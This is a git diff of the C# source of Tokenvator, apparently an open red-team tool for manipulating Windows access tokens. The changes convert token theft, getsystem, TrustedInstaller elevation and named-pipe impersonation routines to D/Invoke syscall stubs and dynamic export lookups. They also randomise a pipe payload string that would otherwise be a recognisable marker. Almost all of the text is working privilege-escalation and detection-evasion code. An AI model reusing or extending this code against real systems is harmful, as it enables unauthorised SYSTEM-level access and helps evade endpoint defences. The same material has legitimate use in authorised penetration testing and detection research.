         ////////////////////////////////////////////////////////////////////////////////
         internal void Run()
         {
+            ////////////////////////////////////////////////////////////////////////////////
+            // Open a limited handle to the process via a syscall stub
+            // IntPtr hProcess = kernel32.OpenProcess(ProcessThreadsApi.ProcessSecurityRights.PROCESS_QUERY_INFORMATION, false, (uint)processId);
+            ////////////////////////////////////////////////////////////////////////////////    
+            IntPtr hNtOpenProcessToken = Generic.GetSyscallStub("NtOpenProcessToken");
+            var fSyscallNtOpenProcessToken = (MonkeyWorks.ntdll.NtOpenProcessToken)Marshal.GetDelegateForFunctionPointer(hNtOpenProcessToken, typeof(MonkeyWorks.ntdll.NtOpenProcessToken));
+
+            uint ntRetVal = 0;
             try
             {
-                Console.Write(context);
-                string input;
-                if (activateTabs)
-                {
-                    try
-                    {
-                        input = console.ReadLine();
-                    }
-                    catch (InvalidOperationException)
-                    {
-                        input = Console.ReadLine();
-                    }
-                }
-                else
-                {
-                    input = Console.ReadLine();
-                }
+                IntPtr hProcess = new IntPtr(-1);
+                ntRetVal = fSyscallNtOpenProcessToken(hProcess, Winnt.TOKEN_ALL_ACCESS, ref currentProcessToken);
+            }
+            catch (Exception ex)
+            {
+                Misc.GetExceptionMessage(ex, "NtOpenProcessToken");
+            }
 
-                IntPtr hToken, tempToken;
-                hToken = tempToken = IntPtr.Zero;
+            if (0 != ntRetVal)
+            {
+                Misc.GetNtError("NtOpenProcessToken", ntRetVal);
+            }
 
-                bool remote = _GetProcessID(input, out processID, out command);
 
-                if (!remote)
+            Console.Write(context);
+            string input;
+            if (activateTabs)
+            {
+                try
+                {
+                    input = console.ReadLine();
+                }
+                catch (InvalidOperationException)
                 {
-                    hProcess = hBackup;
-                    kernel32.OpenProcessToken(hProcess, Winnt.TOKEN_ALL_ACCESS, out hToken);
-                    if (IntPtr.Zero == hToken)
-                    {
-                        Console.WriteLine("[-] Opening Process Token Failed, Opening Thread Token");
-                        IntPtr hThread = kernel32.GetCurrentThread();
-                        kernel32.OpenThreadToken(hThread, Winnt.TOKEN_ALL_ACCESS, true, ref hToken);
-                        if (IntPtr.Zero == hToken)
-                        {
-                            Console.WriteLine("[-] Opening Thread Token Failed, Recommend RevertToSelf");
-                        }
-                    }
+                    input = Console.ReadLine();
                 }
+            }
+            else
+            {
+                input = Console.ReadLine();
+            }               
 
-                string action = Misc.NextItem(ref input);
+            string action = Misc.NextItem(ref input);
 
-                CommandLineParsing cLP = new CommandLineParsing();
-                if (!string.Equals(action, input, StringComparison.OrdinalIgnoreCase))
+            if (!string.Equals(action, input, StringComparison.OrdinalIgnoreCase))
+            {
+                if (!cLP.Parse(input))
                 {
-                    if (!cLP.Parse(input))
-                    {
-                        return;
-                    }    
-                }
+                    return;
+                }    
+            }
 
+            try
+            {
                 switch (action)
                 {
                     case "add_privilege":
-                        _AddPrivilege(cLP);
+                        _AddPrivilege();
                         break;
                         /*
                     case "bypassuac":
@@ -168,52 +168,52 @@ internal void Run()
                         break;
                         */
                     case "clear_desktop_acl":
-                        _ClearDesktopACL(hToken);
+                        _ClearDesktopACL();
                         break;
                     case "clone_token":
-                        _CloneToken(cLP, hToken);
+                        _CloneToken();
                         break;
                     case "create_token":
-                        _CreateToken(cLP, hToken);
+                        _CreateToken();
                         break;
                     case "delete_driver":
-                        _UnInstallDriver(cLP);
+                        _UnInstallDriver();
                         break;
                     case "detach_filter":
-                        _FilterDetach(cLP);
+                        _FilterDetach();
                         break;
                     case "disable_group":
-                        _DisableGroup(cLP, hToken);
+                        _DisableGroup();
                         break;
                     case "disable_privilege":
-                        _AlterPrivilege(cLP, hToken, Winnt.TokenPrivileges.SE_PRIVILEGE_NONE);
+                        _AlterPrivilege(Winnt.TokenPrivileges.SE_PRIVILEGE_NONE);
                         break;
                     case "enable_privilege":
-                        _AlterPrivilege(cLP, hToken, Winnt.TokenPrivileges.SE_PRIVILEGE_ENABLED);
+                        _AlterPrivilege(Winnt.TokenPrivileges.SE_PRIVILEGE_ENABLED);
                         break;
                     case "exit":
                         Environment.Exit(0);
                         break;
                     case "find_user_processes":
-                        _FindUserProcesses(cLP);
+                        _FindUserProcesses();
                         break;
                     case "find_user_processes_wmi":
-                        _FindUserProcessesWMI(cLP);
+                        _FindUserProcessesWMI();
                         break;
                     case "getinfo":
-                        _Info(cLP, hToken);
+                        _Info();
                         break;
                     case "getsystem":
-                        _GetSystem(cLP, hToken);
+                        _GetSystem();
                         break;
                     case "get_system":
-                        _GetSystem(cLP, hToken);
+                        _GetSystem();
                         break;
                     case "gettrustedinstaller":
-                        _GetTrustedInstaller(cLP, hToken);
+                        _GetTrustedInstaller();
                         break;
                     case "get_trustedinstaller":
-                        _GetTrustedInstaller(cLP, hToken);
+                        _GetTrustedInstaller();
                         break;
                     case "help":
                         _Help(input);
@@ -222,50 +222,50 @@ internal void Run()
                         console.GetHistory();
                         break;
                     case "info":
-                        _Info(cLP, hToken);
+                        _Info();
                         break;
                     case "install_driver":
-                        _InstallDriver(cLP);
+                        _InstallDriver();
                         break;
                     case "list_filters":
                         _ListFilters();
                         break;
                     case "list_filter_instances":
-                        _ListFiltersInstances(cLP);
+                        _ListFiltersInstances();
                         break;
                     case "list_privileges":
-                        _ListPrivileges(cLP, hToken);
+                        _ListPrivileges();
                         break;
                     case "logon_user":
-                        _LogonUser(cLP, hToken);
+                        _LogonUser();
                         break;
                     case "nuke_privileges":
-                        _NukePrivileges(cLP, hToken);
+                        _NukePrivileges();
                         break;
                     case "pid":
                         Console.WriteLine("[+] Process ID: {0}", Process.GetCurrentProcess().Id);
                         Console.WriteLine("[+] Parent ID:  {0}", Process.GetCurrentProcess().Parent().Id);
                         break;
                     case "remove_privilege":
-                        _AlterPrivilege(cLP, hToken, Winnt.TokenPrivileges.SE_PRIVILEGE_REMOVED);
+                        _AlterPrivilege(Winnt.TokenPrivileges.SE_PRIVILEGE_REMOVED);
                         break;
                     case "is_critical_process":
-                        _IsCriticalProcess(cLP, hProcess);
+                        _IsCriticalProcess();
                         break;
                     case "set_critical_process":
-                        _SetCriticalProcess(cLP, hProcess);
+                        _SetCriticalProcess();
                         break;
                     case "reverttoself":
-                        Console.WriteLine(advapi32.RevertToSelf() ? "[*] Reverted token to " + WindowsIdentity.GetCurrent().Name : "[-] RevertToSelf failed");
+                        _RevertToSelf();
                         break;
                     case "run":
-                        _Run(cLP);
+                        _Run();
                         break;
                     case "runas":
-                        _RunAsNetOnly(cLP);
+                        _RunAsNetOnly();
                         break;
                     case "runpowershell":
-                        _RunPowerShell(cLP);
+                        _RunPowerShell();
                         break;
                     case "sample_processes":
                         _SampleProcess();
@@ -277,28 +277,28 @@ internal void Run()
                         UserSessions.EnumerateInteractiveUserSessions();
                         break;
                     case "start_driver":
-                        _StartDriver(cLP);
+                        _StartDriver();
                         break;
                     case "steal_pipe_token":
-                        _StealPipeToken(cLP);
+                        _StealPipeToken();
                         break;
                     case "steal_token":
-                        _StealToken(cLP, hToken);
+                        _StealToken();
                         break;
                     case "tasklist":
                         UserSessions.Tasklist();
                         break;
                     case "terminate":
-                        _Terminate(cLP);
+                        _Terminate();
                         break;
                     case "unfreeze_token":
-                        _UnfreezeToken(cLP);
+                        _UnfreezeToken();
                         break;
                     case "uninstall_driver":
-                        _UnInstallDriver(cLP);
+                        _UnInstallDriver();
                         break;
                     case "unload_filter":
-                        _FilterUnload(cLP);
+                        _FilterUnload();
                         break;
                     case "whoami":
                         Console.WriteLine("[*] Operating as {0}", WindowsIdentity.GetCurrent().Name);
@@ -307,52 +307,13 @@ internal void Run()
                         _Help(input);
                         break;
                 }
-
-                if (IntPtr.Zero != hToken)
-                    kernel32.CloseHandle(hToken);
             }
-            catch (Exception error)
+            catch (Exception ex)
             {
-                Console.WriteLine(error.ToString());
+                Misc.GetExceptionMessage(ex, "MainLoop");
                 Misc.GetWin32Error("MainLoop");
             }
             Console.WriteLine();
         }
-
-        ////////////////////////////////////////////////////////////////////////////////
-        // Identifies a process to access
-        ////////////////////////////////////////////////////////////////////////////////
-        private static bool _GetProcessID(string input, out int processID, out string command)
-        {
-            string name = Misc.NextItem(ref input);
-            command = string.Empty;
-
-            string arg1 = Misc.NextItem(ref input);
-            if (int.TryParse(arg1, out processID))
-            {
-                if (arg1 != input)
-                {
-                    command = input;
-                }
-                return true;
-            }
-
-            Process[] process = Process.GetProcessesByName(arg1);
-            if (0 < process.Length)
-            {
-                processID = process.First().Id;
-                if (arg1 != input)
-                {
-                    command = input;
-                }
-                return true;
-            }
-
-            if (arg1 != input)
-            {
-                command = input;
-            }
-            return false;
-        }
     }
 }
diff --git a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
index 7312713..1f41e7d 100644
--- a/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
+++ b/Tokenvator/Plugins/AccessTokens/AccessTokens.cs
@@ -6,14 +6,14 @@
 using System.Security;
 using System.Security.Principal;
 
+using DInvoke.DynamicInvoke;
+
 using Tokenvator.Resources;
 using Tokenvator.Plugins.Execution;
 
 using MonkeyWorks.Unmanaged.Headers;
 //using MonkeyWorks.Unmanaged.Libraries;
 
-using DInvoke.DynamicInvoke;
-
 namespace Tokenvator.Plugins.AccessTokens
 {
     using MonkeyWorks = MonkeyWorks.Unmanaged.Libraries.DInvoke;
@@ -35,12 +35,14 @@ class AccessTokens : IDisposable
 
         private readonly IntPtr hNtOpenProcess;
         private readonly IntPtr hNtOpenProcessToken;
-        private readonly IntPtr hNtClose;
+        private static readonly IntPtr hNtClose = Generic.GetSyscallStub("NtClose");
 
+        ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Default constructor
         /// </summary>
         /// <param name="currentProcessToken"></param>
+        ////////////////////////////////////////////////////////////////////////////////
         public AccessTokens(IntPtr currentProcessToken)
         {        
             phNewToken = new IntPtr();
@@ -52,7 +54,21 @@ public AccessTokens(IntPtr currentProcessToken)
 
             hNtOpenProcess = Generic.GetSyscallStub("NtOpenProcess");
             hNtOpenProcessToken = Generic.GetSyscallStub("NtOpenProcessToken");
-            hNtClose = Generic.GetSyscallStub("NtClose");
+        }
+
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Alternative constructor for instances when OpenProcess/OpenProcessToken isn't called
+        /// </summary>
+        ////////////////////////////////////////////////////////////////////////////////
+        public AccessTokens()
+        {
+            phNewToken = new IntPtr();
+            hExistingToken = new IntPtr();
+            currentProcessToken = new IntPtr();
+
+            hWorkingToken = new IntPtr();
+            hWorkingThreadToken = new IntPtr();
         }
 
         #region Get/Set
@@ -117,7 +133,7 @@ public IntPtr GetWorkingToken()
         ////////////////////////////////////////////////////////////////////////////////
         [SecurityCritical]
         [HandleProcessCorruptedStateExceptions]
-        public bool DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL impersonationLevel)
+        public bool DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL impersonationLevel, Winnt._TOKEN_TYPE tokenType)
         {
             IntPtr hNtDuplicateToken = Generic.GetSyscallStub("NtDuplicateToken");
             MonkeyWorks.ntdll.NtDuplicateToken fSyscallNtDuplicateToken = (MonkeyWorks.ntdll.NtDuplicateToken)Marshal.GetDelegateForFunctionPointer(hNtDuplicateToken, typeof(MonkeyWorks.ntdll.NtDuplicateToken));
@@ -127,7 +143,7 @@ public bool DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL impersonationLeve
             Winnt._SECURITY_QUALITY_OF_SERVICE securityContextTrackingMode = new Winnt._SECURITY_QUALITY_OF_SERVICE()
             {
                 Length = (uint)Marshal.SizeOf(typeof(Winnt._SECURITY_QUALITY_OF_SERVICE)),
-                ImpersonationLevel = Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation,//SecurityAnonymous
+                ImpersonationLevel = impersonationLevel,//SecurityAnonymous
                 ContextTrackingMode = Winnt.SECURITY_CONTEXT_TRACKING_MODE.SECURITY_STATIC_TRACKING,
                 EffectiveOnly = Winnt.EFFECTIVE_ONLY.False
             };
@@ -149,7 +165,7 @@ public bool DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL impersonationLeve
 
             try
             {
-                ntRetVal = fSyscallNtDuplicateToken(hWorkingToken, (uint)Winnt.ACCESS_MASK.MAXIMUM_ALLOWED, hObjectAttributes.AddrOfPinnedObject(), false, Winnt._TOKEN_TYPE.TokenImpersonation, ref phNewToken);
+                ntRetVal = fSyscallNtDuplicateToken(hWorkingToken, (uint)Winnt.ACCESS_MASK.MAXIMUM_ALLOWED, hObjectAttributes.AddrOfPinnedObject(), false, tokenType, ref phNewToken);
             }
             catch (Exception ex)
             {
@@ -495,7 +511,7 @@ public virtual bool ImpersonateUser()
             // Winbase._SECURITY_ATTRIBUTES securityAttributes = new Winbase._SECURITY_ATTRIBUTES();
             // advapi32.DuplicateTokenEx(hWorkingToken, (uint)Winnt.ACCESS_MASK.MAXIMUM_ALLOWED, ref securityAttributes, Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, Winnt._TOKEN_TYPE.TokenPrimary, out phNewToken)
             ////////////////////////////////////////////////////////////////////////////////
-            DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation);
+            DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, Winnt._TOKEN_TYPE.TokenImpersonation);
 
             ////////////////////////////////////////////////////////////////////////////////
             // Impersonate a newly duplicated token
@@ -548,7 +564,7 @@ public virtual bool ImpersonateUser()
         ////////////////////////////////////////////////////////////////////////////////
         [SecurityCritical]
         [HandleProcessCorruptedStateExceptions]
-        protected bool CloseHandle(IntPtr handle)
+        public static bool CloseHandle(IntPtr handle)
         {
             if (IntPtr.Zero == handle)
             {
diff --git a/Tokenvator/Plugins/AccessTokens/CreateTokens.cs b/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
index ccc87f7..4c2d378 100644
--- a/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
+++ b/Tokenvator/Plugins/AccessTokens/CreateTokens.cs
@@ -46,6 +46,15 @@ public CreateTokens(IntPtr token) : base(token)
             SetWorkingTokenToSelf();
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Alternate Constructor for when there isn't a need to call openprocess
+        /// </summary>
+        ////////////////////////////////////////////////////////////////////////////////
+        public CreateTokens() : base()
+        {
+        }
+
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Default destructor
diff --git a/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs b/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
index c1b6856..acdaeff 100644
--- a/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
+++ b/Tokenvator/Plugins/AccessTokens/TokenManipulation.cs
@@ -33,6 +33,17 @@ internal TokenManipulation(IntPtr currentProcessToken) : base(currentProcessToke
 
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Default Constructor
+        /// </summary>
+        /// <param name="currentProcessToken"></param>
+        ////////////////////////////////////////////////////////////////////////////////
+        internal TokenManipulation() : base()
+        {
+
+        }
+
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// IDisposable to free the allocated pointers
@@ -82,7 +93,7 @@ public bool GetSystem(string newProcess)
                             hExistingToken = ti.GetWorkingToken();
 
                             SetWorkingTokenToRemote();
-                            if (!DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation))
+                            if (!DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, Winnt._TOKEN_TYPE.TokenPrimary))
                             {
                                 continue;
                             }
@@ -199,7 +210,7 @@ public bool GetTrustedInstaller(string newProcess)
             }
 
             SetWorkingTokenToRemote();
-            if (!DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation))
+            if (!DuplicateToken(Winnt._SECURITY_IMPERSONATION_LEVEL.SecurityImpersonation, Winnt._TOKEN_TYPE.TokenPrimary))
             {
                 Misc.GetWin32Error("DuplicateToken");
                 return false;
@@ -445,5 +456,33 @@ public bool SetTokenPrivilege(string privilege, Winnt.TokenPrivileges attribute)
             return true;
         }
         #endregion
+
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Removes the thread token, causing the process to execute with the process 
+        /// token.
+        /// Converted to D/Invoke GetPebLdrModuleEntry/GetExportAddress
+        /// </summary>
+        /// <returns></returns>
+        ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
+        public bool RevertToSelf()
+        {
+            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
+            IntPtr hRevertToSelf = Generic.GetExportAddress(hadvapi32, "RevertToSelf");
+            MonkeyWorks.advapi32.RevertToSelf fRevertToSelf = (MonkeyWorks.advapi32.RevertToSelf)Marshal.GetDelegateForFunctionPointer(hRevertToSelf, typeof(MonkeyWorks.advapi32.RevertToSelf));
+
+            try
+            {
+                return fRevertToSelf();
+            }
+            catch (Exception ex)
+            {
+                Console.WriteLine("[-] RevertToSelf Generated an Exception");
+                Console.WriteLine("[-] {0}", ex.Message);
+                return false;
+            }
+        }
     }
 }
diff --git a/Tokenvator/Plugins/Execution/CreateProcess.cs b/Tokenvator/Plugins/Execution/CreateProcess.cs
index 07343d4..3707b0d 100644
--- a/Tokenvator/Plugins/Execution/CreateProcess.cs
+++ b/Tokenvator/Plugins/Execution/CreateProcess.cs
@@ -18,7 +18,7 @@ static class CreateProcess
     {
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
-        /// Wrapper for CreateProcessWithLogonW
+        /// Wrapper for CreateProcessWithLogonW - for use token impersonation.
         /// Converted to GetPebLdrModuleEntry/GetExportAddress
         /// </summary>
         /// <param name="phNewToken"></param>
@@ -44,8 +44,7 @@ public static bool CreateProcessWithLogonW(IntPtr phNewToken, string name, strin
             }
             catch (Exception ex)
             {
-                Console.WriteLine("[-] ImpersonateLoggedOnUser Generated an Exception");
-                Console.WriteLine("[-] {0}", ex.Message);
+                Misc.GetExceptionMessage(ex, "ImpersonateLoggedOnUser");
                 return false;
             }
 
@@ -128,8 +127,7 @@ public static bool CreateProcessWithLogonW(IntPtr phNewToken, string name, strin
             }
             catch (Exception ex)
             {
-                Console.WriteLine("[-] CreateProcessWithLogonW Generated an Exception");
-                Console.WriteLine("[-] {0}", ex.Message);
+                Misc.GetExceptionMessage(ex, "CreateProcessWithLogonW");
                 return false;
             }
 
@@ -142,8 +140,7 @@ public static bool CreateProcessWithLogonW(IntPtr phNewToken, string name, strin
                 }
                 catch (Exception ex)
                 {
-                    Console.WriteLine("[-] RevertToSelf Generated an Exception");
-                    Console.WriteLine("[-] {0}", ex.Message);
+                    Misc.GetExceptionMessage(ex, "RevertToSelf");
                 }
 
                 return false;
@@ -164,6 +161,63 @@ public static bool CreateProcessWithLogonW(IntPtr phNewToken, string name, strin
             return true;
         }
 
+        ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Wrapper for CreateProcessWithLogonW - for use with explicit credentials
+        /// Converted to GetPebLdrModuleEntry/GetExportAddress
+        /// </summary>
+        /// <param name="phNewToken"></param>
+        /// <param name="name"></param>
+        /// <param name="arguments"></param>
+        /// <returns></returns>
+        ////////////////////////////////////////////////////////////////////////////////
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
+        public static bool CreateProcessWithLogonW(string username, string domain, string password, string command, string arguments)
+        {
+            IntPtr hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
+            IntPtr hCreateProcessWithLogonW = Generic.GetExportAddress(hadvapi32, "CreateProcessWithLogonW");
+            MonkeyWorks.advapi32.CreateProcessWithLogonW fCreateProcessWithLogonW = (MonkeyWorks.advapi32.CreateProcessWithLogonW)Marshal.GetDelegateForFunctionPointer(hCreateProcessWithLogonW, typeof(MonkeyWorks.advapi32.CreateProcessWithLogonW));
+
+            Winbase._STARTUPINFO startupInfo = new Winbase._STARTUPINFO
+            {
+                cb = (uint)Marshal.SizeOf(typeof(Winbase._STARTUPINFO))
+            };
+            Winbase._PROCESS_INFORMATION processInformation;
+
+            bool retVal = false;
+            try
+            {
+                retVal = fCreateProcessWithLogonW(
+                    username, domain, password,
+                    Winbase.LOGON_FLAGS.LOGON_NETCREDENTIALS_ONLY,
+                    command,
+                    arguments,
+                    Winbase.CREATION_FLAGS.CREATE_NEW_PROCESS_GROUP,
+                    IntPtr.Zero,
+                    Environment.CurrentDirectory,
+                    ref startupInfo,
+                    out processInformation
+                );
+            }
+            catch (Exception ex)
+            {
+                Misc.GetExceptionMessage(ex, "CreateProcessWithLogonW");
+                return false;
+            }
+
+            if (!retVal)
+            {
+                Misc.GetWin32Error("CreateProcessWithLogonW");
+                return false;
+            }
+
+            Console.WriteLine("[+] Process ID: {0}", processInformation.dwProcessId);
+            Console.WriteLine("[+] Thread ID:  {0}", processInformation.dwThreadId);
+
+            return true;
+        }
+
         ////////////////////////////////////////////////////////////////////////////////
         /// <summary>
         /// Wrapper for CreateProcessWithTokenW
diff --git a/Tokenvator/Plugins/NamedPipes/NamedPipes.cs b/Tokenvator/Plugins/NamedPipes/NamedPipes.cs
index 601ba6a..b176dd2 100644
--- a/Tokenvator/Plugins/NamedPipes/NamedPipes.cs
+++ b/Tokenvator/Plugins/NamedPipes/NamedPipes.cs
@@ -1,10 +1,16 @@
 using System;
 using System.IO;
 using System.IO.Pipes;
+using System.Runtime.InteropServices;
+using System.Runtime.ExceptionServices;
+using System.Security;
 using System.Security.AccessControl;
 using System.Threading;
 
+using DInvoke.DynamicInvoke;
+
 using Tokenvator.Resources;
+using Tokenvator.Plugins.AccessTokens;
 using Tokenvator.Plugins.Execution;
 
 using MonkeyWorks.Unmanaged.Headers;
@@ -13,58 +19,86 @@
 
 namespace Tokenvator.Plugins.NamedPipes
 {
-    class NamedPipes
+    using MonkeyWorks = MonkeyWorks.Unmanaged.Libraries.DInvoke;
+
+    class NamedPipes : IDisposable
     {
-        private static IntPtr hToken = IntPtr.Zero;
+        private readonly IntPtr hadvapi32;
         private const string BASE_DIRECTORY = @"\\.\pipe\";
         private static readonly AutoResetEvent waitHandle = new AutoResetEvent(false);
 
         private delegate bool Create(IntPtr phNewToken, string newProcess, string arguments);
 
+        private Winnt._TOKEN_TYPE tokenType;
+        private readonly AccessTokens.AccessTokens accessTokens;
+
         ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// Default Constructor
+        /// Converted to D/Invoke GetPebLdrModuleEntry
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
         internal NamedPipes()
         {
-            
+            hadvapi32 = Generic.GetPebLdrModuleEntry("advapi32.dll");
+            accessTokens = new AccessTokens.AccessTokens();
         }
 
         ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
         /// GetSystem function for when SeDebugPrivilege is not available
+        /// No Conversion Required
+        /// </summary>
         ////////////////////////////////////////////////////////////////////////////////
-        internal static void GetSystem()
+        internal bool GetSystem()
         {
-            if (!_GetSystem())
-                return;
+            tokenType = Winnt._TOKEN_TYPE.TokenImpersonation;
 
-            if (IntPtr.Zero != hToken)
+            if (!_GetSystem())
             {
-                advapi32.ImpersonateLoggedOnUser(hToken);
-                kernel32.CloseHandle(hToken);
-                Console.WriteLine("[+] Operating as {0}", System.Security.Principal.WindowsIdentity.GetCurrent().Name);
-                hToken = IntPtr.Zero;
+                return false;
             }
+
+            return accessTokens.ImpersonateUser();
         }
 
         ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
         /// GetSystem function for when SeDebugPrivilege is not available
+        /// No conversions required
+        /// </summary>
+        /// <param name="command"></param>
+        /// <param name="arguments"></param>
         ////////////////////////////////////////////////////////////////////////////////
-        internal static void GetSystem(string command, string arguments)
+        internal bool GetSystem(string command, string arguments)
         {
+            tokenType = Winnt._TOKEN_TYPE.TokenPrimary;
+
             if (!_GetSystem())
-                return;
+            {
+                return false;
+            }
 
             Create createProcess;
             if (0 == System.Diagnostics.Process.GetCurrentProcess().SessionId)
+            {
                 createProcess = CreateProcess.CreateProcessWithLogonW;
+            }
             else
+            {
                 createProcess = CreateProcess.CreateProcessWithTokenW;
-            createProcess(hToken, command, arguments);
+            }
+            return createProcess(accessTokens.GetWorkingToken(), command, arguments);
         }
 
         ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
         /// Internal GetSystem function where the magic happens
+        /// No conversions required
+        /// </summary>
+        /// <returns></returns>
         ////////////////////////////////////////////////////////////////////////////////
-        private static bool _GetSystem()
+        private bool _GetSystem()
         {
             string pipename = Misc.GenerateUuid(12);
 
@@ -77,7 +111,7 @@ private static bool _GetSystem()
                     Console.WriteLine("[-] Unable to connect to local service host");
                     return false;
                 }
-                if (!psExec.Create("%COMSPEC% /c echo tokenvator > " + BASE_DIRECTORY + pipename))
+                if (!psExec.Create("%COMSPEC% /c echo " + Misc.GenerateUuid(8) + " > " + BASE_DIRECTORY + pipename))
                     return false;
                 if (!psExec.Open())
                     return false;
@@ -94,8 +128,12 @@ private static bool _GetSystem()
         }
 
         ////////////////////////////////////////////////////////////////////////////////
+        /// <summary>
+        /// 
+        /// </summary>
+        /// <param name="pipeName"></param>
         ////////////////////////////////////////////////////////////////////////////////
-        public static void GetPipeToken(string pipeName)
+        public void GetPipeToken(string pipeName)
         {
             Console.WriteLine("[*] Creating Listener Thread");
             Thread thread = new Thread(() => _GetPipeToken(pipeName));
@@ -106,23 +144,12 @@ public static void GetPipeToken(string pipeName)
             thread.Join();
             Console.WriteLine("[*] Joined Thread");
 
-            if (IntPtr.Zero != hToken)
-            {
-                if (!advapi32.ImpersonateLoggedOnUser(hToken))
-                {
-                    Console.WriteLine("[-] Token Impersonation Failed");
-                    Misc.GetWin32Error("ImpersonateLoggedOnUser");
-                }
-
-                kernel32.CloseHandle(hToken);
-                Console.WriteLine("[+] Operating as {0}", System.Security.Principal.WindowsIdentity.GetCurrent().Name);
-                hToken = IntPtr.Zero;
-            }
+            accessTokens.ImpersonateUser();
         }
 
         ////////////////////////////////////////////////////////////////////////////////
         ////////////////////////////////////////////////////////////////////////////////
-        public static void GetPipeToken(string pipeName, string command, string arguments)
+        public void GetPipeToken(string pipeName, string command, string arguments)
         {
             Console.WriteLine("[*] Creating Listener Thread");
             Thread thread = new Thread(() => _GetPipeToken(pipeName));
@@ -133,88 +160,103 @@ public static void GetPipeToken(string pipeName, string command, string argument
             thread.Join();
             Console.WriteLine("[*] Joined Thread");
 
-            if (IntPtr.Zero != hToken)
+            Create createProcess;
+            if (0 == System.Diagnostics.Process.GetCurrentProcess().SessionId)
             {
-                Create createProcess;
-                if (0 == System.Diagnostics.Process.GetCurrentProcess().SessionId)
-                    createProcess = CreateProcess.CreateProcessWithLogonW;
-                else
-                    createProcess = CreateProcess.CreateProcessWithTokenW;
-                createProcess(hToken, command, arguments);
+                createProcess = CreateProcess.CreateProcessWithLogonW;
             }
+            else
+            {
+                createProcess = CreateProcess.CreateProcessWithTokenW;
+            }
+            createProcess(accessTokens.GetWorkingToken(), command, arguments);
         }
 
         ////////////////////////////////////////////////////////////////////////////////
         ////////////////////////////////////////////////////////////////////////////////
-        private static bool _GetPipeToken(string pipeName)
+        [SecurityCritical]
+        [HandleProcessCorruptedStateExceptions]
+        private bool _GetPipeToken(string pipeName)
         {
-            try
+            PipeSecurity pipeSecurity = new PipeSecurity();
+            pipeSecurity.AddAccessRule(new PipeAccessRule("Everyone", PipeAccessRights.ReadWrite, AccessControlType.Allow));
+            using (NamedPipeServerStream namedPipe = new NamedPipeServerStream(
+                pipeName, 
+                PipeDirection.InOut, 2, 
+                PipeTransmissionMode.Message, 
+                PipeOptions.None, 
+                128, 128, pipeSecurity
+            ))
             {
-                PipeSecurity pipeSecurity = new PipeSecurity();
-                pipeSecurity.AddAccessRule(new PipeAccessRule("Everyone", PipeAccessRights.ReadWrite, AccessControlType.Allow));
-                using (NamedPipeServerStream namedPipe = new NamedPipeServerStream(
-                    pipeName, 
-                    PipeDirection.InOut, 2, 
-                    PipeTransmissionMode.Message, 
-                    PipeOptions.None, 
-                    128, 128, pipeSecurity
-                ))
-                {
-                    Console.WriteLine("[+] Created Pipe {0}", BASE_DIRECTORY + pipeName);
-                    namedPipe.WaitForConnection();
-                    Console.WriteLine("[+] Connected to Pipe {0}", pipeName);
-                    using (var streamReader = new StreamReader(namedPipe))
+                Console.WriteLine("[+] Created Pipe {0}", BASE_DIRECTORY + pipeName);
+                waitHandle.Set();
+                namedPipe.WaitForConnection();
+                Console.WriteLine("[+] Connected to Pipe {0}", pipeName);
+                using (var streamReader = new StreamReader(namedPipe))
+                {       
+                    streamReader.ReadToEnd();
+
+                    ////////////////////////////////////////////////////////////////////////////////
+                    // advapi32.ImpersonateNamedPipeClient(namedPipe.SafePipeHandle.DangerousGetHandle())
+                    ////////////////////////////////////////////////////////////////////////////////
+                    IntPtr hImpersonateNamedPipeClient = Generic.GetExportAddress(hadvapi32, "ImpersonateNamedPipeClient");
+                    MonkeyWorks.advapi32.ImpersonateNamedPipeClient fImpersonateNamedPipeClient = (MonkeyWorks.advapi32.ImpersonateNamedPipeClient)Marshal.GetDelegateForFunctionPointer(hImpersonateNamedPipeClient, typeof(MonkeyWorks.advapi32.ImpersonateNamedPipeClient));
+
+                    bool retVal = false;
+                    try
                     {
-                        streamReader.ReadToEnd();
-                        if (!advapi32.ImpersonateNamedPipeClient(namedPipe.SafePipeHandle.DangerousGetHandle()))
-                        {
-                            Misc.GetWin32Error("ImpersonateNamedPipeClient");
-                            return false;
-                        }
-                        Console.WriteLine("[+] Impersonated Pipe {0}", pipeName);
